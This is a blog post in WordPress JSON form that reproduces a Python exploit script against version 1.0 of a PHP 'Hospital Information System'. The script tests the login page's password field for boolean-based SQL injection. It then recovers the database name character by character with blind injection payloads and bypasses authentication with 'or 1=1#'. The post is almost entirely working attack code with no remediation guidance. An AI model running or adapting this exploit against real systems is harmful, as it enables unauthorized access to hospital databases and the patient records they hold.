# Exploit Title: Hospital Information System – SQL Injection via login page
\n# Date: 25\/07\/2022
\n# Exploit Author: saitamang
\n# Vendor Homepage: https:\/\/code-projects.org
\n# Software Link: https:\/\/download-media.code-projects.org\/2019\/11\/HOSPITAL_INFORMATION_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip
\n# Version: 1.0
\n# Tested on: Centos 7 apache2 + MySQL<\/p>\n
import requests, string, sys, warnings, time, concurrent.futures
\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning
\nwarnings.simplefilter(‘ignore’,InsecureRequestWarning)<\/p>\n
dbname = ”<\/p>\n
req = requests.Session()<\/p>\n
def login(ip,username,password):
\ntarget = “http:\/\/%s\/HIS\/includes\/users\/UsersController.php” %ip<\/p>\n
data = {‘type’:’login’,’username’:username,’password’:password}
\nresponse = req.post(target, data=data)<\/p>\n
if ‘success’ in response.text:
\nprint(“[$] Success Login with credentials “+username+”:”+password+””)
\nelse:
\nprint(“[$] Failed Login with credentials “+username+”:”+password+””)<\/p>\n
def check_injection():
\n# library inj
\ntest_query0 = “‘or 1=2#”
\ntest_query1 = “‘or 1=1#”<\/p>\n
target = “http:\/\/%s\/HIS\/includes\/users\/UsersController.php” %ip<\/p>\n
result = “”<\/p>\n
for i in range(2):<\/p>\n
if i==0:
\ndata = {‘type’:’login’,’username’:username,’password’:test_query0}
\nresponse = req.post(target, data=data)
\nif response.text==”success”:
\nresult = response.text
\nelse:
\npass
\nif i==1:
\ndata = {‘type’:’login’, ‘username’:username,’password’:test_query1}
\nresponse = req.post(target, data=data)
\nif response.text==”success”:
\nresult = response.text
\nelse:
\npass
\nif result==”success”:
\nprint(“[##] SQLI Boolean-Based Present at password field :)”)
\nelse:
\nprint(“[##] No SQLI :)”)<\/p>\n
def brute(dbname):
\ntarget = “http:\/\/%s\/HIS\/includes\/users\/UsersController.php” %ip<\/p>\n
l=0<\/p>\n
no = [int(a) for a in str(string.digits)]\n# checking length of dbname
\nfor i in no: # 0-9<\/p>\n
payload = “‘or 1=1 and length(database())='”+ str(i) +”‘#”
\n#print(payload)<\/p>\n
data = {‘type’:’login’,’username’:username,’password’:payload}
\nresponse = req.post(target, data=data)
\nresult = response.text<\/p>\n
if result==”success”:
\nprint(“[##] The correct length of DB name is “+str(i))
\nl=i
\nbreak
\nelse:
\nprint(“[##] The length of DB name “+str(i)+” is wrong”)
\npass<\/p>\n
char = [char for char in string.ascii_lowercase]\ndbname = []\n
for i in range(l):
\nfor j in char:
\npayload = “‘or 1=1 and substring(database(),” + str(i+1) + “,1)='” + str(j) +”‘#”<\/p>\n
data = {‘type’:’login’,’username’:username,’password’:payload}
\nresponse = req.post(target, data=data)
\nresult = response.text<\/p>\n
if result==”success”:
\ndbname.append(j)
\nprint(“[+] The ” + str(i+1) + ” char of DB name is “+str(j))
\nbreak
\nelse:
\npass<\/p>\n
dbname = ”.join(dbname)<\/p>\n
print(“[+] Database name retrieved –> “+dbname)
\nprint(“[+] Bypass completed :)”)
\nprint(“[+] Bypass payload can be used is \\n’or 1=1#”)<\/p>\n
password = “‘or 1=1#”
\nprint(“\\nRetry to login with new payload in password field”)
\nlogin(ip,username,password)<\/p>\n
if __name__ == “__main__”:
\nprint(” _____ _ __ “)
\nprint(” \/ ___\/____ _(_) \/_____ _____ ___ ____ _____ ____ _”)
\nprint(” \\__ \\\/ __ `\/ \/ __\/ __ `\/ __ `__ \\\/ __ `\/ __ \\\/ __ `\/”)
\nprint(” ___\/ \/ \/_\/ \/ \/ \/_\/ \/_\/ \/ \/ \/ \/ \/ \/ \/_\/ \/ \/ \/ \/ \/_\/ \/ “)
\nprint(“\/____\/\\__,_\/_\/\\__\/\\__,_\/_\/ \/_\/ \/_\/\\__,_\/_\/ \/_\/\\__, \/ “)
\nprint(” \/____\/ \\n\\n”)<\/p>\n
try:
\nip = sys.argv[1].strip()
\nusername = sys.argv[2].strip()
\npassword = sys.argv[3].strip()<\/p>\n
login(ip,username,password)
\ncheck_injection()
\nbrute(dbname)<\/p>\n
except IndexError:
\nprint(“[-] Usage %s <ip> <username> <password>” % sys.argv[0])
\nprint(“[-] Example: %s 192.168.100.x admin admin123” % sys.argv[0])
\nsys.exit(-1)<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Hospital Information System – SQL Injection via login page # Date: 25\/07\/2022 # Exploit Author: saitamang # Vendor Homepage: https:\/\/code-projects.org # Software Link: https:\/\/download-media.code-projects.org\/2019\/11\/HOSPITAL_INFORMATION_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip # Version: 1.0 # Tested on: Centos 7 apache2 + MySQL import requests, string, sys, warnings, time, concurrent.futures from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter(‘ignore’,InsecureRequestWarning) dbname = ” req = …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28450","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28450","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28450"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28450\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28450"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28450"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28450"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}